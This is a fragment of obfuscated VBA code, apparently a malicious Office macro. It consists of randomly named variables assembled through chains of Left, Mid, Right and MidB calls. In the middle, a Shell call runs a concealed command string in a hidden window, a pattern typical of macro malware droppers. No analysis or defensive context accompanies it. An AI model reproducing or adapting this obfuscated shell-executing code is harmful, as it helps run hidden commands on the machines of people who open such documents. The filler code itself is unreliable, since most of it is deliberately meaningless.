WsrTCP(1) = Left(towICJuzEhh + cvrjNjwiHUjupaGizwMFskuANJWZP + mNsNQbRs, 720) + Left(NMzUsajjm + qwvTilYkuchWMOQlkbldXiBtQ + jfwWXtRztjUAZ, 965) + Right(cHiKCMAapFV + jrHoEkzkApUzdFQaLfmlmlnUiWhSX + MoMMUNmu, 541) + MidB(KTivKOtq + HFVCRQTOTXwGRQDNrRwTcbTmjL + hGiEiqJDwT, 609, 173)
   Dim ChKiF(2)
ChKiF(0) = Right(NZrlFlwfIqjijL + lVPnCMJEoPKJHRGJjatOHZF + srzzwGYJpUrBQm, 947) + Mid(nVAZaYNKZAs + NwiKMwPKDjIRpQovYfljhZSTlpX + ChGvWGZAaRb, 342, 329) + Left(ijKILwhc + zkucdVpzFjjidvwOKSPHJk + OujUFiiYViX, 924) + MidB(UNLZzAhzzBjN + hclrbqbDUliEAEjXCSYzCwBzPzhlrNnqst + FKQsauvzcL, 259, 583)
ChKiF(1) = Mid(swijBGZtMGnznr + uqriNOhKVqBUDjDEwLMrZuMwKEbGEn + XnwjiPULL, 320, 465) + Mid(WkvqWVBi + nBPWFuilOnMQGPrAjIWnqoUfQ + NhYUKfOtO, 329, 556)
Shell@ KmkpRUzAZiC, CInt(msoBarTypeNormal)
   Dim CZRbz(1)
CZRbz(0) = MidB(zcsUroz + uzPdMctowZrhzTnXSUEmfIMHNuUr + wtPqzoZjdc, 455, 604) + Mid(cZjTWScHq + UzVftihcwjGDYdHuqbOzioOAVwtqCEGioE + wpCliWVivsKh, 332, 285)
   Dim uEqqfd(2)
uEqqfd(0) = Right(DtDzruoDtHd + pNITfFclLZnHVkNJDVdWiVrBDGnKlX + riXAXku, 832) + Left(sVJEpkDIv + YpznEYiXCjhftfztbrUDd + zRDGdcNwSsZMT, 214)
uEqqfd(1) = Right(FNIoiLKzA + wPDmUSMNUHYHUmNqdiLXPpUh + GGGSZOiPGEuGl, 48) + Right(oBTzlXkJhUnrow + AlGNBGhFwKjJWwJYSBSNjWwkFbq + DKGzvlwi, 388)
   Dim zTDkOo(2)
zTDkOo(0) = Left(CnuYkCt + RVGEoOqosCiHvmvidGRYX + RMoXVcbqhJ, 287) + Left(FMvJwKXv + OzGPDAzwjWSwzhXaHQOOnYQKIcMKaZdZa + YqhNfCqJh, 916) + MidB(kPfdhUiTqm + UWLsWBaGIMjahOMzOiPfEvwvFrvWlApsJqz + VVPXjEvsFWW, 538, 80) + MidB(QuQzaFUP + zZrvFVzcCtJoEqBDzVYZdcOaAMaAGCh + DwAAXzBhCcq, 31, 123)
zTDkOo(1) = Left(VtpvQAN + uwPbsDlWfMzGzBufsbAunYfNNmSiq + FYkaowqU, 417) + Mid(vVYnAkHlSSV + CMqYjNhGdqPKFDdKEDdJoZliWE + jUIXbIRkIMVRf, 167, 221) + Right(DIIOSEPZDBz + LCSAfIBhbUsuoqLijDTvCbRQszYHRmd + zidDpzbnP, 899) + Mid(ZOYVlCbrG + OrIjDNbhRmMzDKFFnjtATjAl + BJLjGOLjOYao, 258, 118)
End Function
